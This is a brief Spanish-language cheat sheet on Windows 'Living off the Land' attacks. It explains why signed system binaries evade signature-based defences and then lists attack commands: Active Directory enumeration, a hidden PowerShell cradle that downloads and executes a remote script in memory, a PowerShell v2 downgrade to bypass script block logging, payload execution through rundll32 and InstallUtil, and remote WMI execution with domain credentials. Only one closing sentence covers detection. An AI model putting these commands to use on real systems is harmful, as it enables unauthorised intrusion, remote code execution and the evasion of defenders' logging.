Qué es
Living off the Land usa las herramientas que ya trae Windows, en vez de subir las propias. El atacante enumera el dominio y ejecuta código con binarios firmados por Microsoft. Su actividad se confunde con administración normal y esquiva las defensas por firma.
Cómo funciona
Windows trae una superficie administrativa amplia: PowerShell, WMI, net y dsquery consultan el host, la red y Active Directory sin traer código nuevo. Los binarios de ejecución (rundll32.exe, installutil.exe) están firmados por Microsoft y viven en C:\Windows. AppLocker permite por defecto lo que está en esa carpeta, y la firma de Microsoft aporta confianza. El binario de confianza corre la carga. En el árbol de procesos, la acción parece salir de un componente normal de Windows. No hay binario nuevo que detectar, así que la detección por firma o por lista de permitidos no dispara.
Comandos
Enumerar el host y el dominio sin traer herramientas:
systeminfo
net user /domain
net group "Domain Admins" /domain
dsquery user -limit 0
wmic computersystem get domain,nameDescargar y ejecutar en memoria con PowerShell:
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<FILE>')"Bajar a PowerShell v2 para esquivar el registro de bloques de script:
powershell -version 2 -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<FILE>')"Ejecutar un DLL del atacante con rundll32.exe, donde <FUNC> es la función exportada:
rundll32.exe <FILE>,<FUNC>Ejecutar código con installutil.exe por el método Uninstall:
InstallUtil.exe /logfile= /LogToConsole=false /U <FILE>Ejecución remota con WMI:
wmic /node:<HOST> /user:<DOMAIN>\<USER> process call create "<FILE>"Cómo defenderse
Detecta por comportamiento: rundll32 o installutil que lanzan una shell o abren una conexión de red son sospechosos aunque tengan firma válida.